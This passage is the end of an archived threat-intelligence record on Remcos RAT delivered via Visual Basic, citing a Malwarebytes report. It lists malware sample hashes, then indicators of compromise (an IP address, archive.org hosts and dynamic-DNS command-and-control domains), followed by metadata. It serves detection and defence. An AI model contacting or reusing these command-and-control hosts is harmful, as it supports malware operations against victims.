Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nSource: https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 42 of 42",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/"
	],
	"report_names": [
		"remcos-rat-delivered-via-visual-basic"
	],
	"threat_actors": [],
	"ts_created_at": 1775434529,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/afdb6d26545806385fb8b0974ed373f474fcb366.pdf",
		"text": "https://archive.orkl.eu/afdb6d26545806385fb8b0974ed373f474fcb366.txt",
		"img": "https://archive.orkl.eu/afdb6d26545806385fb8b0974ed373f474fcb366.jpg"
	}
}